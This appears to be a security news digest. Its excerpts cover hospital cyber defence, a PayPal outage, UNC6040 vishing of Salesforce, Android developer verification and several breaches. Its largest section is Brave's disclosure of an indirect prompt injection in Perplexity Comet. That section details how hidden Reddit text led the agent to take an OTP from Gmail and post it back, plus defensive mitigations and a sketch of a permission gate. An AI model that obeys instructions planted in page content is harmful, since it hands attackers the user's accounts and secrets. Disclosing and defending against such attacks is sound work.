Swiss health groups found national cyber-security centre to warn against cyber attacks.

The cantonal hospital authorities of Ticino and Graubünden are among the founders of the Healthcare Cyber Security Centre (H-CSC).

The premise is that “hospitals are tempting targets for cybercriminals, since they handle large quantities of sensitive data,” said H-CSC as it was officially established in Thurgau.

The initiative in Ticino was also joined by the Gruppo ospedaliero Moncucco, which brings together the Moncucco clinics in Lugano and Santa Chiara in Locarno, and a Graubünden foundation made up of health care associations, including the Thusis hospital.

Founding members also include the university hospitals of Basel, Bern and Zurich, but not in Geneva and Lausanne.

French-speaking institutions are clearly under-represented – the Fribourg and Valais hospitals are the only members from this region. But H-CSC is set to grow. “Membership of the association will be open from 1 September 2025 to all hospitals with a public service mandate”.

The H-CSC project was launched last year on the recommendation of the Federal Office for Cyber Security. The aim of the association is to offer tailor-made security services for hospitals in the field of cyber security.

The H-CSC (https://www.h-csc.ch/) will serve as a platform to promote knowledge exchange and collaboration between hospitals, expand existing competencies and create synergies that will “sustainably strengthen their ability to prevent, detect and contain cyber incidents”, the association’s website states.

Such incidents can “severely compromise the functioning (of hospitals), causing the postponement of surgeries, encryption and/or disclosure of sensitive patient data, or the inoperability of medical devices.”

www.swissinfo.ch EN 2025 Switzerland H-CSC project health alliance hospitals
Euro banks block 'unauthorized' PayPal direct debits https://www.theregister.com/2025/08/28/euro_banks_block_paypal_direct_debits/
28/08/2025 18:31:01

www.theregister.com 2025/08/28/ -
US payments platform back in action, says it's informing affected customers
Shoppers and merchants in Germany found themselves dealing with billions of euros in frozen transactions this week, thanks to an apparent failure in PayPal's fraud-detection systems.

According to the Association of German Banks, the problem hit on Monday when banks noticed a slew of recent unauthorized direct debits from PayPal. The body said the banks responded in various ways, which is one way of putting it – the Süddeutsche Zeitung reported that some stopped all PayPal transactions, with the total number of frozen payments likely to be around €10 billion.

A spokesperson for the German Savings Banks Association (DSGV), which represents hundreds of regional banks across the country, confirmed the issue to The Register. The DSGV said PayPal had assured it the problem was resolved, adding that PayPal payments had been running smoothly since Tuesday morning and the US payments platform was informing affected customers "directly."

The DSGV said the unauthorized payments had a "significant impact on transactions throughout Europe, particularly in Germany." However, there have been no confirmed reports of the incident being felt outside Germany. Austrian media reported that the banks there had seen no problems.

PayPal is the most popular method of online payment in Germany, having been used for 28.5 percent of online purchases last year, according to research by the EHI Retail Institute. (The next most popular option is buying on account.)

That's largely down to PayPal's payment protection, which appeals to privacy-conscious Germans. In the wake of the unauthorized direct debit issue, financial industry consultant Peter Woeste Christensen told local media that PayPal's particular strength in Germany was partly thanks to the poor user experience of German banks' own apps.

PayPal had not responded to The Register's request for comment at the time of publication, although SZ quoted a spokesperson as saying PayPal had quickly identified the cause and was working with banks to "ensure all accounts are updated." The US company referred to the incident as a "temporary service interruption."

PayPal's reputational hit in Germany is likely to be exacerbated by last week's reports of hackers offering millions of PayPal credentials that they claimed PayPal had recently exposed in plaintext. The hackers' claims appear dubious, with PayPal denying any recent breach, but the reports gained significant traction in Germany.

"It's possible that the data is incorrect or outdated," read a Wednesday advisory from the German consumer organization Stiftung Warentest, which bundled the leak report with this week's snafu. "Nonetheless, PayPal users should change their passwords as a precaution."

theregister.com EN 2025 PayPal fraud direct debits precaution Germany
Intelligence Brief: UNC6040 Threat Assessment https://cstromblad.com/posts/threat-assessment-unc6040/
27/08/2025 10:11:34

cstromblad.com Christoffer Strömblad Wednesday, August 27, 2025 -
In this multi-source analysis I’ve attempted to fuse publicly available information about the UNC6040 group into one report and analysis to provide a better view of the activity cluster named UNC6040 (Google/Mandiant naming).

Executive Summary
UNC6040 represents a sophisticated financially motivated threat group that has emerged as a significant threat to organizations utilizing cloud-based customer relationship management systems. First identified by Google’s Threat Intelligence Group [1], this actor has been conducting voice phishing campaigns since at least December 2024 [2] to compromise Salesforce environments for large-scale data theft and extortion purposes.

The group has successfully breached approximately 20 organizations across hospitality, retail, and education sectors [3], demonstrating a clear preference for targets with substantial customer databases and valuable personally identifiable information. Perhaps most notably, the group successfully compromised Google’s own Salesforce environment through sophisticated OAuth token abuse [4], highlighting their capability to breach even well-defended organizations.

What distinguishes UNC6040 from traditional threat actors is their primary reliance on social engineering rather than technical exploitation. By impersonating IT support personnel through voice calls, they guide victims to authorize malicious connected apps, specifically modified versions of Salesforce’s Data Loader tool [1]. This approach effectively bypasses traditional security controls including multi-factor authentication, representing a fundamental shift in the threat landscape that security teams must address.

Threat Actor Profile and Victimology
UNC6040’s targeting reveals a calculated approach to victim selection. The group primarily focuses on luxury retailers, hospitality organizations, and educational institutions [3], with additional confirmed targeting of aviation, financial services, and technology companies [2]. This sector preference suggests a clear understanding of where high-value customer data concentrates and where cloud CRM adoption is mature.

The threat actor demonstrates varying levels of technical proficiency across different intrusions, with some operations achieving complete data extraction while others result in only partial exfiltration before detection [1]. This inconsistency may indicate either multiple operators with different skill levels or an evolving tradecraft as the group refines their techniques.

Intelligence suggests potential collaboration with other threat actors, particularly the ShinyHunters collective [4]. UNC6040 may engage in partnership models where initial compromise and data theft are followed by collaboration with specialized extortion groups months after the initial breach [1]. This delayed monetization strategy complicates attribution and incident response efforts.

Operational Capabilities and Techniques
The group’s attack methodology begins with extensive reconnaissance through automated phone systems and live calls where operators impersonate IT support staff [5][3]. This initial intelligence gathering phase allows them to understand organizational structures, identify key personnel, and develop credible pretexts for their social engineering approaches.

The technical implementation involves guiding victims to Salesforce’s connected app setup page where they authorize malicious applications using connection codes [1]. These modified Data Loader applications are often disguised with legitimate-sounding names such as “My Ticket Portal” to align with the social engineering narrative [1][3]. Once authorized, these applications provide API-level access enabling bulk data exfiltration through legitimate platform features.

Post-compromise activities extend beyond the initial Salesforce environment. The group demonstrates capability for lateral movement, targeting Okta, Microsoft 365, and Workplace environments to harvest additional credentials and expand their access [3][2]. They employ test queries before conducting full data extraction [1], suggesting a methodical approach to validating access and identifying high-value datasets.

The group’s data exfiltration focuses on customer PII including names, dates of birth, addresses, phone numbers, and account metadata [2]. By avoiding custom malware and instead relying on legitimate tools and platform features, they maintain a minimal forensic footprint that complicates detection and attribution efforts [2].

Infrastructure and Operational Security
UNC6040 demonstrates strong operational security practices, primarily accessing victim environments through Mullvad VPN IP addresses [1]. This VPN usage provides anonymity and complicates law enforcement efforts to track the group’s activities. The threat actors also utilize Okta phishing panels hosted on the same infrastructure as their vishing operations [1], suggesting a centralized approach to their technical infrastructure.

The group’s infrastructure choices reflect an understanding of modern detection capabilities and a deliberate effort to blend malicious activity with legitimate traffic patterns. By leveraging standard Salesforce API calls and OAuth workflows [4], they avoid triggering traditional security alerts focused on malware or anomalous network traffic.

Strategic Outlook and Future Developments
The success of UNC6040’s operations, including the high-profile breach of Google’s Salesforce environment [4], will likely inspire both evolution of their own tactics and adoption of similar techniques by other threat actors. In the near term, we assess with moderate confidence that the group will expand their targeting to additional cloud CRM platforms as organizations increase security awareness around Salesforce-specific threats.

The demonstrated collaboration between UNC6040 and groups like ShinyHunters [4] suggests a maturing criminal ecosystem where specialized actors collaborate to maximize the value extracted from compromised organizations. This partnership model is likely to expand, with UNC6040 potentially serving as an initial access broker for ransomware operations or other extortion groups.

The fundamental challenge posed by UNC6040 lies not in their technical sophistication but in their exploitation of human trust and legitimate platform features. As organizations implement phishing-resistant MFA and enhanced monitoring capabilities [5], the group will likely evolve their social engineering tactics and potentially shift toward supply chain targeting through managed service providers and cloud service integrators.

Looking forward, the convergence of voice-based social engineering with OAuth abuse and API-level data access represents a maturation of the threat landscape that traditional perimeter-based security models are poorly equipped to address. Organizations must anticipate continued activity from UNC6040 and similar groups, with potential escalation in both the scale of operations and the sophistication of social engineering techniques employed.

The shift from technical exploitation to identity-based attacks demonstrated by UNC6040 requires a fundamental reconsideration of security architectures. As legitimate platform features become the primary vector for data exfiltration, the distinction between authorized and malicious activity becomes increasingly nuanced, demanding behavioral analytics and continuous monitoring capabilities that many organizations currently lack.

References
[1] https://cloud.google.com/blog/topics/threat-intelligence/voice-phishing-data-extortion/
[2] https://unit42.paloaltonetworks.com/retail-hospitality-heists-in-the-digital-age/
[3] https://www.varonis.com/blog/salesforce-vishing-threat-unc604
[4] https://guardz.com/blog/from-vishing-to-oauth-abuse-how-shinyhunters-compromised-the-cloud/
[5] https://cloud.google.com/blog/topics/threat-intelligence/technical-analysis-vishing-threats/

cstromblad.com EN 2025 UNC6040 threat-actor Salesforce
Agentic Browser Security: Indirect Prompt Injection in Perplexity Comet https://brave.com/blog/comet-prompt-injection/
27/08/2025 10:05:52

brave.com blog Published Aug 20, 2025 -

The attack we developed shows that traditional Web security assumptions don't hold for agentic AI, and that we need new security and privacy architectures for agentic browsing.

The threat of instruction injection
At Brave, we’re developing the ability for our in-browser AI assistant Leo to browse the Web on your behalf, acting as your agent. Instead of just asking “Summarize what this page says about London flights”, you can command: “Book me a flight to London next Friday.” The AI doesn’t just read, it browses and completes transactions autonomously. This will significantly expand Leo’s capabilities while preserving Brave’s privacy guarantees and maintaining robust security guardrails to protect your data and browsing sessions.

This kind of agentic browsing is incredibly powerful, but it also presents significant security and privacy challenges. As users grow comfortable with AI browsers and begin trusting them with sensitive data in logged in sessions—such as banking, healthcare, and other critical websites—the risks multiply. What if the model hallucinates and performs actions you didn’t request? Or worse, what if a benign-looking website or a comment left on a social media site could steal your login credentials or other sensitive data by adding invisible instructions for the AI assistant?

To compare our implementation with others, we examined several existing solutions, such as Nanobrowser and Perplexity’s Comet. While looking at Comet, we discovered vulnerabilities which we reported to Perplexity, and which underline the security challenges faced by agentic AI implementations in browsers. The attack demonstrates how easy it is to manipulate AI assistants into performing actions that were prevented by long-standing Web security techniques, and how users need new security and privacy protections in agentic browsers.

The vulnerability we’re discussing in this post lies in how Comet processes webpage content: when users ask it to “Summarize this webpage,” Comet feeds a part of the webpage directly to its LLM without distinguishing between the user’s instructions and untrusted content from the webpage. This allows attackers to embed indirect prompt injection payloads that the AI will execute as commands. For instance, an attacker could gain access to a user’s emails from a prepared piece of text in a page in another tab.

How the attack works
Setup: An attacker embeds malicious instructions in Web content through various methods. On websites they control, attackers might hide instructions using white text on white backgrounds, HTML comments, or other invisible elements. Alternatively, they may inject malicious prompts into user-generated content on social media platforms such as Reddit comments or Facebook posts.
Trigger: An unsuspecting user navigates to this webpage and uses the browser’s AI assistant feature, for example clicking a “Summarize this page” button or asking the AI to extract key points from the page.
Injection: As the AI processes the webpage content, it sees the hidden malicious instructions. Unable to distinguish between the content it should summarize and instructions it should not follow, the AI treats everything as user requests.
Exploit: The injected commands instruct the AI to use its browser tools maliciously, for example navigating to the user’s banking site, extracting saved passwords, or exfiltrating sensitive information to an attacker-controlled server.
This attack is an example of an indirect prompt injection: the malicious instructions are embedded in external content (like a website, or a PDF) that the assistant processes as part of fulfilling the user’s request.

Attack demonstration
To illustrate the severity of this vulnerability in Comet, we created a proof-of-concept demonstration:

In this demonstration, you can see:

A user visits a Reddit post, with a comment containing the prompt injection instructions hidden behind the spoiler tag.

The user clicks the Comet browser’s “Summarize the current webpage” button.

While processing the page for summarization, the Comet AI assistant sees and processes these hidden instructions.

The malicious instructions command the Comet AI to:

Navigate to https://www.perplexity.ai/account/details and extract the user’s email address
Navigate to https://www.perplexity.ai./account and log in with this email address to receive an OTP (one-time password) from Perplexity (note that the trailing dot creates a different domain, perplexity.ai. vs perplexity.ai, to bypass existing authentication)
Navigate to https://gmail.com, where the user is already logged in, and read the received OTP
Exfiltrate both the email address and the OTP by replying to the original Reddit comment
The attacker learns the victim’s email address, and can take over their Perplexity account using the exfiltrated OTP and email address combination.

Once the user tries to summarize the Reddit post with the malicious comment in Comet, the attack happens without any further user input.

Impact and implications
This attack presents significant challenges to existing Web security mechanisms. When an AI assistant follows malicious instructions from untrusted webpage content, traditional protections such as same-origin policy (SOP) or cross-origin resource sharing (CORS) are all effectively useless. The AI operates with the user’s full privileges across authenticated sessions, providing potential access to banking accounts, corporate systems, private emails, cloud storage, and other services.

Unlike traditional Web vulnerabilities that typically affect individual sites or require complex exploitation, this attack enables cross-domain access through simple, natural language instructions embedded in websites. The malicious instructions could even be included in user-generated content on a website the attacker doesn’t control (for example, attack instructions hidden in a Reddit comment). The attack is both indirect in interaction, and browser-wide in scope.

The attack we developed shows that traditional Web security assumptions don’t hold for agentic AI, and that we need new security and privacy architectures for agentic browsing.

Possible mitigations
In our analysis, we came up with the following strategies which could have prevented attacks of this nature. We’ll discuss this topic more fully in the next blog post in this series.

The browser should distinguish between user instructions and website content
The browser should clearly separate the user’s instructions from the website’s contents when sending them as context to the backend. The contents of the page should always be treated as untrusted. Note that once the model on the backend gets passed both the trusted user request and the untrusted page contents, its output must be treated as potentially unsafe.

The model should check user-alignment for tasks
Based upon the task and the context, the model comes up with actions for the browser to take; these actions should be treated as “potentially unsafe” and should be independently checked for alignment against the user’s requests. This is related to the previous point about differentiating between the user’s requests (trusted) and the contents of the page (always untrusted).

Security and privacy sensitive actions should require user interaction
No matter the prior agent plan and tasks, the model should require explicit user interaction for security and privacy-sensitive tasks. For example: sending an email should always prompt the user to confirm right before the email is sent, and an agent should never automatically click through a TLS connection error interstitial.

The browser should isolate agentic browsing from regular browsing
Agentic browsing is an inherently powerful-but-risky mode for the user to be in, as this attack demonstrates. It should be impossible for the user to “accidentally” end up in this mode while casually browsing. Does the browser really need the ability to open your email account, send emails, and read sensitive data from every logged-in site if all you’re trying to do is summarize Reddit discussions? As with all things in the browser, permissions should be as minimal as possible. Powerful agentic capabilities should be isolated from regular browsing tasks, and this difference should be intuitively obvious to the user. This clean separation is especially important in these early days of agentic security, as browser vendors are still working out how to prevent security and privacy attacks. In future posts, we’ll cover more about how we are working towards a safer agentic browsing experience with fine-grained permissions.
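The four mitigations above fit together as a small policy layer between the model and the browser. The following Python sketch is an added illustration of that layer, not Brave's or Perplexity's code: the user's request is the only trusted input, page text is passed to the model as a labelled data record rather than concatenated into the instruction, and every action the planner emits is re-checked against the capabilities the user's task actually needs, with sensitive actions held for an explicit confirmation. The task vocabulary, the `Action`/`Verdict` types and the sample plan are assumptions constructed for the example; the plan mirrors the steps the post describes so the reader can see where each one is stopped.

```python
"""Permission gate for an agentic browser (added illustration, not a real
browser's API).  Implements the post's mitigations: trusted/untrusted context
separation, per-task minimal capabilities, origin binding of actions, and a
mandatory confirmation for sensitive actions.  All names are assumptions."""
from dataclasses import dataclass
from urllib.parse import urlsplit

# Hypothetical capability sets per user task.  "Summarize this page" needs
# nothing beyond reading the tab the user is already looking at.
TASK_CAPABILITIES = {
    "summarize": {"read_page"},
    "fill_form": {"read_page", "type", "click", "submit_form"},
}

# Actions that never run on the planner's say-so alone, whatever the task.
ALWAYS_CONFIRM = {"submit_form", "send_email", "read_credentials"}


@dataclass
class Action:
    kind: str          # e.g. "navigate", "read_page", "submit_form"
    url: str = ""      # origin the action touches (empty = current tab)
    detail: str = ""   # planner free text; treated as untrusted, never parsed


@dataclass
class Verdict:
    action: Action
    decision: str      # "allow" | "confirm" | "deny"
    reason: str


def origin(url: str) -> str:
    """Reduce a URL to scheme://host.  The trailing-dot FQDN form of a host
    ('perplexity.ai.') is folded onto the canonical host so the same site
    cannot be made to look like a new origin to policy checks."""
    parts = urlsplit(url)
    host = (parts.hostname or "").rstrip(".").lower()
    return f"{parts.scheme}://{host}"


def build_context(user_request: str, page_text: str) -> list[dict]:
    """Keep the trusted user request and the untrusted page content as
    separate records; the page is data for the model, not instructions."""
    return [
        {"role": "user", "trusted": True, "content": user_request},
        {"role": "data", "trusted": False, "source": "page", "content": page_text},
    ]


def gate(task: str, current_url: str, plan: list[Action]) -> list[Verdict]:
    """Check each planner action against the user's task.  Order matters:
    capability first, then origin, then the confirmation requirement."""
    allowed = TASK_CAPABILITIES.get(task, set())
    tab_origin = origin(current_url)
    verdicts = []
    for act in plan:
        if act.kind not in allowed:
            verdicts.append(Verdict(act, "deny",
                            f"'{act.kind}' is not needed for task '{task}'"))
        elif act.url and origin(act.url) != tab_origin:
            verdicts.append(Verdict(act, "deny",
                            "touches an origin outside the user's task"))
        elif act.kind in ALWAYS_CONFIRM:
            verdicts.append(Verdict(act, "confirm",
                            "sensitive action needs explicit user confirmation"))
        else:
            verdicts.append(Verdict(act, "allow", "within task scope"))
    return verdicts


if __name__ == "__main__":
    # Constructed scenario: the user asked for a summary of a forum thread;
    # the planner, fed the page as data, still emitted the post's sequence.
    tab = "https://www.reddit.com/r/example/comments/abc"
    plan = [
        Action("read_page", tab),
        Action("navigate", "https://www.perplexity.ai/account/details"),
        Action("navigate", "https://www.perplexity.ai./account"),
        Action("read_page", "https://mail.google.com/"),
        Action("submit_form", tab, detail="post reply"),
    ]
    for v in gate("summarize", tab, plan):
        print(f"{v.decision:8} {v.action.kind:12} {v.action.url:45} {v.reason}")
```

Only the first action survives; navigation and reads of other origins are denied because a summary task was never granted them, and the reply that would carry data off the page is denied for the same reason. Under a task that legitimately includes `submit_form` the gate returns `confirm` rather than `allow`, which is the hook for the "prompt the user right before it happens" rule above.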

Disclosure timeline
July 25, 2025: Vulnerability discovered and reported to Perplexity
July 27, 2025: Perplexity acknowledged the vulnerability and implemented an initial fix
July 28, 2025: Retesting revealed the fix was incomplete; additional details and comments were provided to Perplexity
August 11, 2025: One-week public disclosure notice sent to Perplexity
August 13, 2025: Final testing confirmed the vulnerability appears to be patched
August 20, 2025: Public disclosure of vulnerability details (Update: on further testing after this blog post was released, we learned that Perplexity still hasn’t fully mitigated the kind of attack described here. We’ve re-reported this to them.)

Research Motivation
We believe strongly in raising the privacy and security bar across the board for agentic browsing. A safer Web is good for everyone. As we saw, giving an agent authority to act on the Web, especially within a user’s authenticated context, carries significant security and privacy risks. Our goal with this research is to surface those risks early and demonstrate practical defenses. This helps Brave, Perplexity, other browsers, and (most importantly) all users.

We look forward to collaborating with Perplexity and the broader browser and AI communities on hardening agentic AI and, where appropriate, standardizing security boundaries that agentic features rely on.

Conclusion
This vulnerability in Perplexity Comet highlights a fundamental challenge with agentic AI browsers: ensuring that the agent only takes actions that are aligned with what the user wants. As AI assistants gain more powerful capabilities, indirect prompt injection attacks pose serious risks to Web security.

Browser vendors must implement robust defenses against these attacks before deploying AI agents with powerful Web interaction capabilities. Security and privacy cannot be an afterthought in the race to build more capable AI tools.

Since its inception, Brave has been committed to providing industry-leading privacy and security protections to its users, and to promoting Web standards that reflect this commitment. In the next blog post of the series we will talk about Brave’s approach to securing the browser agent in order to deliver secure AI browsing to our nearly 100 million users.

brave.com EN 2025 Comet AI attack Indirect-Prompt-Injection Perplexity
Android Developers Blog: A new layer of security for certified Android devices https://android-developers.googleblog.com/2025/08/elevating-android-security.html
27/08/2025 09:32:50

android-developers.googleblog.com 25 August 2025 Posted by Suzanne Frey – VP, Product, Trust & Growth for Android
Starting in 2026 and in select countries first, Android apps must be registered to a verified developer in order to be installed.

You shouldn’t have to choose between open and secure. By engineering security into the core part of the OS, Android has proven that you can have both, and we continue taking new steps in that direction.

As new threats emerge, we’ve continued to evolve our defenses. Following recent attacks, including those targeting people's financial data on their phones, we've worked to increase developer accountability to prevent abuse. We’ve seen how malicious actors hide behind anonymity to harm users by impersonating developers and using their brand image to create convincing fake apps. The scale of this threat is significant: our recent analysis found over 50 times more malware from internet-sideloaded sources than on apps available through Google Play.

To better protect users from repeat bad actors spreading malware and scams, we're adding another layer of security to make installing apps safer for everyone: developer verification.

Starting next year, Android will require all apps to be registered by verified developers in order to be installed by users on certified Android devices. This creates crucial accountability, making it much harder for malicious actors to quickly distribute another harmful app after we take the first one down. Think of it like an ID check at the airport, which confirms a traveler's identity but is separate from the security screening of their bags; we will be confirming who the developer is, not reviewing the content of their app or where it came from. This change will start in a few select countries specifically impacted by these forms of fraudulent app scams, often from repeat perpetrators.

Since we implemented verification requirements on Google Play in 2023, we have seen firsthand how helpful developer identification is in stopping bad actors from exploiting anonymity to distribute malware, commit financial fraud, and steal sensitive data. Bringing a similar process to Android more broadly will provide a consistent, common sense baseline of developer accountability across the ecosystem.

In early discussions about this initiative, we've been encouraged by the supportive initial feedback we've received. In Brazil, the Brazilian Federation of Banks (FEBRABAN) sees it as a “significant advancement in protecting users and encouraging accountability.” This support extends to governments as well, with Indonesia's Ministry of Communications and Digital Affairs praising it for providing a “balanced approach” that protects users while keeping Android open. Similarly, Thailand’s Ministry of Digital Economy and Society sees it as a “positive and proactive measure” that aligns with their national digital safety policies. And partners like the Developer’s Alliance have called this a “critical step” for ensuring “trust, accountability, and security” across the entire ecosystem.

To make this process as streamlined as possible, we are building a new Android Developer Console just for developers who only distribute outside of Google Play, so they can easily complete their verification; get an early look at how it works. A note for student and hobbyist developers: we know your needs are different from commercial developers, so we’re creating a separate type of Android Developer Console account for you.

If you distribute apps on Google Play, you’ve likely already met these verification requirements through the existing Play Console process. You can find more information about how these requirements apply to you in our guides.

To be clear, developers will have the same freedom to distribute their apps directly to users through sideloading or to use any app store they prefer. We believe this is how an open system should work—by preserving choice while enhancing security for everyone. Android continues to show that with the right design and security principles, open and secure can go hand in hand. For more details on the specific requirements, visit our website. We'll share more information in the coming months.

Timeline and how to prepare
To help you get ready, we encourage all developers who distribute apps on certified Android devices to sign up for early access. This is the best way to prepare and stay informed.

Early participants will also get:

An invitation to an exclusive community discussion forum.
Priority support for these new requirements.
The chance to provide feedback and help us shape the experience.

Here is the timeline to help you plan:
October 2025: Early access begins. Invitations will be sent out gradually.
March 2026: Verification opens for all developers.
September 2026: These requirements go into effect in Brazil, Indonesia, Singapore, and Thailand. At this point, any app installed on a certified Android device in these regions must be registered by a verified developer.
2027 and beyond: We will continue to roll out these requirements globally.

android-developers.googleblog.com EN 2025 verified Android Developers certified
Microsoft Asked FBI for Help Tracking Palestinian Protests https://www.bloomberg.com/news/articles/2025-08-26/microsoft-asked-fbi-for-help-with-israel-gaza-protests
27/08/2025 09:29:00

bloomberg.com 2025-08-26 - Twenty activists urging company to sever ties with Israeli military were arrested last week. Executive Brad Smith said he welcomed discussion but not disruption.

For the better part of a year, Microsoft Corp. has failed to quell a small but persistent revolt by employees bent on forcing the company to sever business ties with Israel over its war in Gaza.

The world’s largest software maker has requested help from the Federal Bureau of Investigation in tracking protests, worked with local authorities to try and prevent them, flagged internal emails containing words like “Gaza” and deleted some internal posts about the protests, according to employees and documents reviewed by Bloomberg. Microsoft has also suspended and fired protesters for disrupting company events.

Despite those efforts, a steady trickle of employees, sometimes joined by outside supporters, continues to speak out in an escalating guerrilla campaign of mass emails and noisy public demonstrations. While still relatively small, the employee activism is notable given the weakening job market and the Trump administration’s crackdown on pro-Palestinian protests.

Last week, 20 people were arrested on a plaza at Microsoft’s Redmond, Washington, headquarters after disregarding orders by police to disperse. Instead, they chanted and called out Microsoft executives by name, linking arms as police dismantled their makeshift barricades and, one by one, zip-tied them and led them away.

On Tuesday, protesters occupied the office of Microsoft President Brad Smith, sharing video on the Twitch livestreaming platform that showed them chanting, hanging banners and briefly attempting to barricade a door with furniture. Smith didn’t appear to be there. Police detained at least two people who entered a building that houses the offices of senior executives, said Jill Green, a spokesperson for the Redmond Police Department. Others were protesting outside, she said.

An employee group called No Azure for Apartheid says that by selling software and artificial intelligence tools to Israel’s military, the company’s Azure cloud service is profiting from the deaths of civilians. Microsoft denies that, but the protests threaten to dent its reputation as a thoughtful employer and reasonable actor on the world stage. In recent years, Microsoft has generally stayed above the fray while its industry peers battled antitrust investigations, privacy scandals or controversial treatment of employees.

Now Microsoft is being forced to grapple with perhaps the most politically charged issue of the day: Israel’s treatment of Palestinians. Earlier this month, the company announced an investigation into reports by the Guardian newspaper and other news outlets that Israel’s military surveillance agency intercepted millions of Palestinian mobile phone calls, stored them on Microsoft servers then used the data to select bombing targets in Gaza. An earlier investigation commissioned by Microsoft found no evidence its software was used to harm people.

Microsoft says it expects customers to adhere to international law governing human rights and armed conflict, and that the company’s terms of service prohibit the use of Microsoft products to violate people’s rights. “If we determine that a customer — any customer — is using our technology in ways that violate our terms of service, we will take steps to address that,” Smith said in an interview last week, adding that the investigation should be completed within several weeks. Smith said employees were welcome to discuss the issue internally but that the company will not tolerate activities that disrupt its operation or staffers.

After Hamas’s deadly Oct. 7, 2023 attack on Israel, Microsoft executives were quick to offer condolences and support to employees. “Let us stand together in our shared humanity,” then-human resources chief Kathleen Hogan said in a note a few days after the attacks, which killed some 1,200 people, including civilians and soldiers.
Unity was short-lived: Jewish employees lamented what they said was a troubling rise in antisemitism. Palestinian staffers and their allies accused executives of ignoring concerns about their welfare and the war in Gaza, which has killed tens of thousands. The debate continued in internal chatrooms, meetings with human resources leaders and in question-and-answer sessions with executives. But the chatter was mostly limited to Microsoft’s halls.

That changed in early April at a bash Microsoft hosted to mark the 50th anniversary of the company’s founding. Early that morning, Vaniya Agrawal picked up Ibtihal Aboussad and drove to Microsoft’s campus. The two early-career company engineers — who respectively hail from the Chicago area and Morocco — had both decided to leave Microsoft over its ties to Israel, which had been documented in a series of articles, including by the Associated Press, and reached out to No Azure for Apartheid. “This isn’t just Microsoft Word with a little Clippy in the corner,” said Agrawal, who was arrested on Wednesday. “These are technological weapons. Cloud and AI are just as deadly as bombs and bullets.”

bloomberg.com EN 2025 Microsoft Israel FBI US
'Cyber partisans' hack Russian TV, broadcast battlefield casualties and 'truth' about war, HUR source claims https://kyivindependent.com/cyber-partisans-hack-russian-tv-to-show-the-truth-about-the-war/
27/08/2025 09:23:04

kyivindependent.com - Russian "cyber partisans" hacked a Russian TV provider on Aug. 24, broadcasting footage that revealed the country’s real battlefield and internal situation, a source in Ukraine’s military intelligence (HUR) told the Kyiv Independent on Aug. 25.

The video, showing Russia’s fuel crisis, water shortages in occupied parts of Donetsk Oblast, Ukrainian strikes on oil refineries and Russia's military losses, was aired simultaneously on 116 television channels on Ukraine's Independence Day, according to the source.

"Three and a half years into the war, and (Russian President Vladimir) Putin has not fully captured a single Ukrainian region. Ukraine remains independent," the video says.

The source claimed that the "local cyber partisans" also blocked access for the provider's administrators, making it more difficult for them to interrupt the unauthorized broadcast.

At least 50,000 viewers in Moscow and other Russian regions were reportedly shown over three hours of footage. The broadcast also appeared on apps via the Apple Store, Google Play, Smart TVs, and other cable networks.

The Kyiv Independent could not verify these reports.

Ukrainian hackers have also been attacking Russian online platforms on a regular basis since Russia's full-scale invasion of Ukraine began in 2022.

In July, cyber specialists from HUR reportedly carried out a large-scale cyberattack against the network infrastructure of Russian energy giant Gazprom, causing significant disruptions.

kyivindependent.com EN 2025 Russia-Ukraine-war Russian TV cyberpartisans hacked Broadcast
Farmers Insurance data breach impacts 1.1M people after Salesforce attack https://www.bleepingcomputer.com/news/security/farmers-insurance-data-breach-impacts-11m-people-after-salesforce-attack/
27/08/2025 09:18:11

bleepingcomputer.com By Lawrence Abrams August 25, 2025
U.S. insurance giant Farmers Insurance has disclosed a data breach impacting 1.1 million customers, with BleepingComputer learning that the data was stolen in the widespread Salesforce attacks.

Farmers Insurance is a U.S.-based insurer that provides auto, home, life, and business insurance products. It operates through a network of agents and subsidiaries, serving more than 10 million households nationwide.

The company disclosed the data breach in an advisory on its website, saying that its database at a third-party vendor was breached on May 29, 2025.

"On May 30, 2025, one of Farmers' third-party vendors alerted Farmers to suspicious activity involving an unauthorized actor accessing one of the vendor's databases containing Farmers customer information (the "Incident")," reads the data breach notification on its website.

"The third-party vendor had monitoring tools in place, which allowed the vendor to quickly detect the activity and take appropriate containment measures, including blocking the unauthorized actor. After learning of the activity, Farmers immediately launched a comprehensive investigation to determine the nature and scope of the Incident and notified appropriate law enforcement authorities."

The company says that its investigation determined that customers' names, addresses, dates of birth, driver's license numbers, and/or last four digits of Social Security numbers were stolen during the breach.

Farmers began sending data breach notifications to impacted individuals on August 22, with a sample notification [1, 2] shared with the Maine Attorney General's Office, stating that a combined total of 1,111,386 customers were impacted.

While Farmers did not disclose the name of the third-party vendor, BleepingComputer has learned that the data was stolen in the widespread Salesforce data theft attacks that have impacted numerous organizations this year.

BleepingComputer contacted Farmers with additional questions about the breach and will update the story if we receive a response.

The Salesforce data theft attacks
Since the beginning of the year, threat actors classified as 'UNC6040' or 'UNC6240' have been conducting social engineering attacks on Salesforce customers.

During these attacks, threat actors conduct voice phishing (vishing) to trick employees into linking a malicious OAuth app with their company's Salesforce instances.

Once linked, the threat actors use the connection to download and steal the databases, which are then used to extort the company through email.

The extortion demands come from the ShinyHunters cybercrime group, who told BleepingComputer that the attacks involve multiple overlapping threat groups, with each group handling specific tasks to breach Salesforce instances and steal data.

"Like we have said repeatedly already, ShinyHunters and Scattered Spider are one and the same," ShinyHunters told BleepingComputer.

"They provide us with initial access and we conduct the dump and exfiltration of the Salesforce CRM instances. Just like we did with Snowflake."

Other companies impacted in these attacks include Google, Cisco, Workday, Adidas, Qantas, Allianz Life, and the LVMH subsidiaries Louis Vuitton, Dior, and Tiffany & Co.

bleepingcomputer.com EN 2025 Data-Breach Data-Theft Farmers-Insurance Insurance Salesforce ShinyHunters
Week 34: Phishing SMS containing fake parcel notifications https://www.ncsc.admin.ch/ncsc/fr/home/aktuell/im-fokus/2025/wochenrueckblick_34.html
27/08/2025 08:56:45

ncsc.admin.ch NCSC/OFCS 26.08.2025 - Last week, the Federal Office for Cybersecurity (OFCS) recorded a significant increase in the number of reports of phishing using fake parcel notifications. In this type of SMS attack, the fraudsters impersonate Swiss Post or DPD in order to obtain sensitive data from citizens. Users of Apple products are particularly affected. In our weekly review, you will learn how to recognise these messages and protect yourself against them.

Currently, the OFCS is receiving numerous reports of phishing SMS messages claiming to come from Swiss Post and DPD. The current wave of attacks deliberately uses modern messaging protocols such as Apple's “iMessage” and Android's “Rich Communication Services” (RCS). Unlike traditional SMS, these messages are end-to-end encrypted. This encryption, which is in fact a security feature intended to protect privacy, is exploited strategically by cybercriminals. It prevents mobile operators from scanning message content for malicious links and blocking them. The scammers thereby bypass an important line of defence and ensure that their messages very likely reach the devices of potential victims.

